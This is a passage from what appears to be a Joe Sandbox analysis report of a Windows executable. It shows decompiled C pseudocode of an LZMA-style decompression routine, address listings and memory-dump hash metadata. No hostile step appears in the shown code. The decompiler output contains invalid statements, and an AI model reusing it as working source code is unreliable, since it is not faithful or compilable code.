                                                  							__eax = _v80 << 4;
                                                  							_v52 = 8;
                                                  							__eax = _v92 + (_v80 << 4) + 0x104;
                                                  							L133:
                                                  							_v92 = __eax;
                                                  							_v68 = 3;
                                                  							goto L147;
                                                  						case 0x14:
                                                  							_v52 = _v52 + __ebx;
                                                  							__eax = _v132;
                                                  							goto L143;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags = _v60 - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L123;
                                                  						case 0x16:
                                                  							__eax = _v52;
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx = _v8;
                                                  							_v68 = 6;
                                                  							__eax = __eax << 7;
                                                  							_v128 = 0x19;
                                                  							_v92 = __eax;
                                                  							goto L148;
                                                  						case 0x17:
                                                  							L148:
                                                  							__eax = _v68;
                                                  							_v84 = 1;
                                                  							_v76 = _v68;
                                                  							goto L152;
                                                  						case 0x18:
                                                  							L149:
                                                  							__eflags = _v112;
                                                  							if(_v112 == 0) {
                                                  								_v140 = 0x18;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v116;
                                                  							__eax = _v16;
                                                  							_v20 = _v20 << 8;
                                                  							__ecx =  *_v116 & 0x000000ff;
                                                  							_v112 = _v112 - 1;
                                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							_t490 =  &_v116;
                                                  							 *_t490 = _v116 + 1;
                                                  							__eflags =  *_t490;
                                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                  							L151:
                                                  							_t493 =  &_v76;
                                                  							 *_t493 = _v76 - 1;
                                                  							__eflags =  *_t493;
                                                  							L152:
                                                  							__eflags = _v76;
                                                  							if(_v76 <= 0) {
                                                  								__ecx = _v68;
                                                  								__ebx = _v84;
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx = _v84 - (1 << __cl);
                                                  								__eax = _v128;
                                                  								_v72 = __ebx;
                                                  								L143:
                                                  								_v140 = _t561;
                                                  								goto L3;
                                                  							}
                                                  							__eax = _v84;
                                                  							_v20 = _v20 >> 0xb;
                                                  							__edx = _v84 + _v84;
                                                  							__eax = _v92;
                                                  							__esi = __edx + __eax;
                                                  							_v88 = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = (_v20 >> 0xb) * __edi;
                                                  							__eflags = _v16 - __ecx;
                                                  							if(_v16 >= __ecx) {
                                                  								_v20 = _v20 - __ecx;
                                                  								_v16 = _v16 - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								_v84 = __edx;
                                                  							} else {
                                                  								_v20 = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								_v84 = _v84 << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags = _v20 - 0x1000000;
                                                  							if(_v20 >= 0x1000000) {
                                                  								goto L151;
                                                  							} else {
                                                  								goto L149;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								_v48 = __ebx;
                                                  								L122:
                                                  								_t399 =  &_v48;
                                                  								 *_t399 = _v48 + 1;
                                                  								__eflags =  *_t399;
                                                  								L123:
                                                  								__eax = _v48;
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									_v52 = _v52 | 0xffffffff;
                                                  									goto L173;
                                                  								}
                                                  								__eflags = __eax - _v100;
                                                  								if(__eax > _v100) {
                                                  									goto L174;
                                                  								}
                                                  								_v52 = _v52 + 2;
                                                  								__eax = _v52;
                                                  								_t406 =  &_v100;
                                                  								 *_t406 = _v100 + _v52;
                                                  								__eflags =  *_t406;
                                                  								goto L126;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							_v48 = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								_v76 = __ecx;
                                                  								L105:
                                                  								__eflags = _v76;
                                                  								if(_v76 <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									_v68 = 4;
                                                  									_v48 = __eax;
                                                  									__eax = _v8;
                                                  									__eax = _v8 + 0x644;
                                                  									__eflags = __eax;
                                                  									L111:
                                                  									__ebx = 0;
                                                  									_v92 = __eax;
                                                  									_v84 = 1;
                                                  									_v72 = 0;
                                                  									_v76 = 0;
                                                  									L115:
                                                  									__eax = _v68;
                                                  									__eflags = _v76 - _v68;
                                                  									if(_v76 >= _v68) {
                                                  										_t397 =  &_v48;
                                                  										 *_t397 = _v48 + __ebx;
                                                  										__eflags =  *_t397;
                                                  										goto L122;
                                                  									}
                                                  									__eax = _v84;
                                                  									_v20 = _v20 >> 0xb;
                                                  									__edi = _v84 + _v84;
                                                  									__eax = _v92;
                                                  									__esi = __edi + __eax;
                                                  									_v88 = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = (_v20 >> 0xb) * __ecx;
                                                  									__eflags = _v16 - __edx;
                                                  									if(_v16 >= __edx) {
                                                  										__ecx = 0;
                                                  										_v20 = _v20 - __edx;
                                                  										__ecx = 1;
                                                  										_v16 = _v16 - __edx;
                                                  										__ebx = 1;
                                                  										__ecx = _v76;
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx = _v72;
                                                  										__ebx = _v72 | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										_v72 = __ebx;
                                                  										 *__esi = __ax;
                                                  										_v84 = __edi;
                                                  									} else {
                                                  										_v20 = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										_v84 = _v84 << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags = _v20 - 0x1000000;
                                                  									if(_v20 >= 0x1000000) {
                                                  										L114:
                                                  										_t374 =  &_v76;
                                                  										 *_t374 = _v76 + 1;
                                                  										__eflags =  *_t374;
                                                  										goto L115;
                                                  									} else {
                                                  										goto L112;
                                                  									}
                                                  								}
                                                  								__ecx = _v16;
                                                  								__ebx = __ebx + __ebx;
                                                  								_v20 = _v20 >> 1;
                                                  								__eflags = _v16 - _v20;
                                                  								_v72 = __ebx;
                                                  								if(_v16 >= _v20) {
                                                  									__ecx = _v20;
                                                  									_v16 = _v16 - _v20;
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									_v72 = __ebx;
                                                  								}
                                                  								__eflags = _v20 - 0x1000000;
                                                  								if(_v20 >= 0x1000000) {
                                                  									L104:
                                                  									_t344 =  &_v76;
                                                  									 *_t344 = _v76 - 1;
                                                  									__eflags =  *_t344;
                                                  									goto L105;
                                                  								} else {
                                                  									goto L102;
                                                  								}
                                                  							}
                                                  							__edx = _v8;
                                                  							__eax = __eax - __ebx;
                                                  							_v68 = __ecx;
                                                  							__eax = _v8 + 0x55e + __eax * 2;
                                                  							goto L111;
                                                  						case 0x1a:
                                                  							L58:
                                                  							__eflags = _v104;
                                                  							if(_v104 == 0) {
                                                  								_v140 = 0x1a;
                                                  								goto L173;
                                                  							}
                                                  							__ecx = _v108;
                                                  							__al = _v96;
                                                  							__edx = _v12;
                                                  							_v100 = _v100 + 1;
                                                  							_v108 = _v108 + 1;
                                                  							_v104 = _v104 - 1;
                                                  							 *_v108 = __al;
                                                  							__ecx = _v24;
                                                  							 *(_v12 + __ecx) = __al;
                                                  							__eax = __ecx + 1;
                                                  							__edx = 0;
                                                  							_t197 = __eax % _v120;
                                                  							__eax = __eax / _v120;
                                                  							__edx = _t197;
                                                  							goto L82;
                                                  						case 0x1b:
                                                  							L78:
                                                  							__eflags = _v104;
                                                  							if(_v104 == 0) {
                                                  								_v140 = 0x1b;
                                                  								goto L173;
                                                  							}
                                                  							__eax = _v24;
                                                  							__eax = _v24 - _v48;
                                                  							__eflags = __eax - _v120;
                                                  							if(__eax >= _v120) {
                                                  								__eax = __eax + _v120;
                                                  								__eflags = __eax;
                                                  							}
                                                  							__edx = _v12;
                                                  							__cl =  *(__edx + __eax);
                                                  							__eax = _v24;
                                                  							_v96 = __cl;
                                                  							 *(__edx + __eax) = __cl;
                                                  							__eax = __eax + 1;
                                                  							__edx = 0;
                                                  							_t280 = __eax % _v120;
                                                  							__eax = __eax / _v120;
                                                  							__edx = _t280;
                                                  							__eax = _v108;
                                                  							_v100 = _v100 + 1;
                                                  							_v108 = _v108 + 1;
                                                  							_t289 =  &_v104;
                                                  							 *_t289 = _v104 - 1;
                                                  							__eflags =  *_t289;
                                                  							 *_v108 = __cl;
                                                  							L82:
                                                  							_v24 = __edx;
                                                  							goto L83;
                                                  						case 0x1c:
                                                  							while(1) {
                                                  								L126:
                                                  								__eflags = _v104;
                                                  								if(_v104 == 0) {
                                                  									break;
                                                  								}
                                                  								__eax = _v24;
                                                  								__eax = _v24 - _v48;
                                                  								__eflags = __eax - _v120;
                                                  								if(__eax >= _v120) {
                                                  									__eax = __eax + _v120;
                                                  									__eflags = __eax;
                                                  								}
                                                  								__edx = _v12;
                                                  								__cl =  *(__edx + __eax);
                                                  								__eax = _v24;
                                                  								_v96 = __cl;
                                                  								 *(__edx + __eax) = __cl;
                                                  								__eax = __eax + 1;
                                                  								__edx = 0;
                                                  								_t420 = __eax % _v120;
                                                  								__eax = __eax / _v120;
                                                  								__edx = _t420;
                                                  								__eax = _v108;
                                                  								_v108 = _v108 + 1;
                                                  								_v104 = _v104 - 1;
                                                  								_v52 = _v52 - 1;
                                                  								__eflags = _v52;
                                                  								 *_v108 = __cl;
                                                  								_v24 = _t420;
                                                  								if(_v52 > 0) {
                                                  									continue;
                                                  								} else {
                                                  									L83:
                                                  									_v140 = 2;
                                                  									goto L3;
                                                  								}
                                                  							}
                                                  							_v140 = 0x1c;
                                                  							L173:
                                                  							_push(0x22);
                                                  							_pop(_t574);
                                                  							memcpy(_v148,  &_v140, _t574 << 2);
                                                  							return 0;
                                                  					}
                                                  				}
                                                  				L174:
                                                  				_t538 = _t537 | 0xffffffff;
                                                  				return _t538;
                                                  			}










































                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x00000000
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                  • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                                                  • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                                                  • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E00406FFE() {
                                                  				signed int _t539;
                                                  				unsigned short _t540;
                                                  				signed int _t541;
                                                  				void _t542;
                                                  				signed int _t543;
                                                  				signed int _t544;
                                                  				signed int _t573;
                                                  				signed int _t576;
                                                  				signed int _t597;
                                                  				signed int* _t614;
                                                  				void* _t621;
                                                  
                                                  				L0:
                                                  				while(1) {
                                                  					L0:
                                                  					if( *(_t621 - 0x40) != 1) {
                                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                  						_t539 =  *(_t621 - 4) + 0x664;
                                                  						 *(_t621 - 0x58) = _t539;
                                                  						goto L68;
                                                  					} else {
                                                  						 *(__ebp - 0x84) = 8;
                                                  						while(1) {
                                                  							L132:
                                                  							 *(_t621 - 0x54) = _t614;
                                                  							while(1) {
                                                  								L133:
                                                  								_t540 =  *_t614;
                                                  								_t597 = _t540 & 0x0000ffff;
                                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                  								if( *(_t621 - 0xc) >= _t573) {
                                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                  									 *(_t621 - 0x40) = 1;
                                                  									_t541 = _t540 - (_t540 >> 5);
                                                  									 *_t614 = _t541;
                                                  								} else {
                                                  									 *(_t621 - 0x10) = _t573;
                                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                  								}
                                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                                  									goto L139;
                                                  								}
                                                  								L137:
                                                  								if( *(_t621 - 0x6c) == 0) {
                                                  									 *(_t621 - 0x88) = 5;
                                                  									L170:
                                                  									_t576 = 0x22;
                                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                  									_t544 = 0;
                                                  									L172:
                                                  									return _t544;
                                                  								}
                                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                  								L139:
                                                  								_t542 =  *(_t621 - 0x84);
                                                  								while(1) {
                                                  									 *(_t621 - 0x88) = _t542;
                                                  									while(1) {
                                                  										L1:
                                                  										_t543 =  *(_t621 - 0x88);
                                                  										if(_t543 > 0x1c) {
                                                  											break;
                                                  										}
                                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                  											case 0:
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													goto L170;
                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  												_t543 =  *( *(_t621 - 0x70));
                                                  												if(_t543 > 0xe1) {
                                                  													goto L171;
                                                  												}
                                                  												_t547 = _t543 & 0x000000ff;
                                                  												_push(0x2d);
                                                  												asm("cdq");
                                                  												_pop(_t578);
                                                  												_push(9);
                                                  												_pop(_t579);
                                                  												_t617 = _t547 / _t578;
                                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                                  												asm("cdq");
                                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                                  												 *(_t621 - 0x3c) = _t612;
                                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                  													L10:
                                                  													if(_t620 == 0) {
                                                  														L12:
                                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                  														goto L15;
                                                  													} else {
                                                  														goto L11;
                                                  													}
                                                  													do {
                                                  														L11:
                                                  														_t620 = _t620 - 1;
                                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                  													} while (_t620 != 0);
                                                  													goto L12;
                                                  												}
                                                  												if( *(_t621 - 4) != 0) {
                                                  													GlobalFree( *(_t621 - 4));
                                                  												}
                                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                  												 *(_t621 - 4) = _t543;
                                                  												if(_t543 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                  													goto L10;
                                                  												}
                                                  											case 1:
                                                  												L13:
                                                  												__eflags =  *(_t621 - 0x6c);
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													 *(_t621 - 0x88) = 1;
                                                  													goto L170;
                                                  												}
                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                  												_t45 = _t621 - 0x48;
                                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                                  												__eflags =  *_t45;
                                                  												L15:
                                                  												if( *(_t621 - 0x48) < 4) {
                                                  													goto L13;
                                                  												}
                                                  												_t555 =  *(_t621 - 0x40);
                                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                                  													L20:
                                                  													 *(_t621 - 0x48) = 5;
                                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                  													goto L23;
                                                  												}
                                                  												 *(_t621 - 0x74) = _t555;
                                                  												if( *(_t621 - 8) != 0) {
                                                  													GlobalFree( *(_t621 - 8));
                                                  												}
                                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                  												 *(_t621 - 8) = _t543;
                                                  												if(_t543 == 0) {
                                                  													goto L171;
                                                  												} else {
                                                  													goto L20;
                                                  												}
                                                  											case 2:
                                                  												L24:
                                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                  												 *(_t621 - 0x84) = 6;
                                                  												 *(_t621 - 0x4c) = _t562;
                                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                  												goto L132;
                                                  											case 3:
                                                  												L21:
                                                  												__eflags =  *(_t621 - 0x6c);
                                                  												if( *(_t621 - 0x6c) == 0) {
                                                  													 *(_t621 - 0x88) = 3;
                                                  													goto L170;
